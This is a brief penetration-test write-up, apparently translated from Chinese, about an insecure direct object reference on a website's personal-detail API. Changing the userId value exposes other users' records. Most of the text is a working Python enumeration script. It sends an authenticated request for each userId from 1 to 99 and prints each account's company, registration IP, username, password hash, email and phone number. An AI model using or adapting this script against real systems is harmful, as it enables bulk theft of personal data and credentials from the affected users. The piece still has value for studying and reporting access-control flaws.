To perform a penetration test on a website, after logging in, click "Edit Information"
Check the request data. One of the request data is as follows. The system echoes account information through the userId value, which involves some sensitive information such as account number, hash password, email address, and mobile phone number.
Try to change the userId value to 1, and successfully echo other people's account information
It shows that the system has the problem of api traversal. Write a python script to traverse the userId value and obtain personal information in batches
The script is as follows
import requests
from colorama import init,Fore
init(autoreset=True)
header = {
'Cookie':'xxx',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip, deflate',
'Token':'625390f4-1103-4923-84b6-92ef86e7141c',
'Referer':'https://xx/userCenter/manCore/manMassage',
'Sec-Fetch-Dest':'empty',
'Sec-Fetch-Mode':'cors',
'Sec-Fetch-Site':'same-origin',
'Te':'trailers',
'Connection':'close',
}
for i in range(1,100):
url = "https://xx/api/personal/detail?userId=%s" %i
try:
res = requests.get(url=url, headers=header)
text = res.json()
company = text.get("data").get("company")
ip = text.get("data").get("createIP")
name = text.get("data").get("userName")
password = text.get("data").get("password")
emil = text.get("data").get("emil")
phone = text.get("data").get("phone")
print(Fore.GREEN+"company:%s, 注册ip:%s, 账号:%s, 密码:%s, 邮箱:%s, 手机号:%s" %(company, ip, name, password, emil, phone))
except:
pass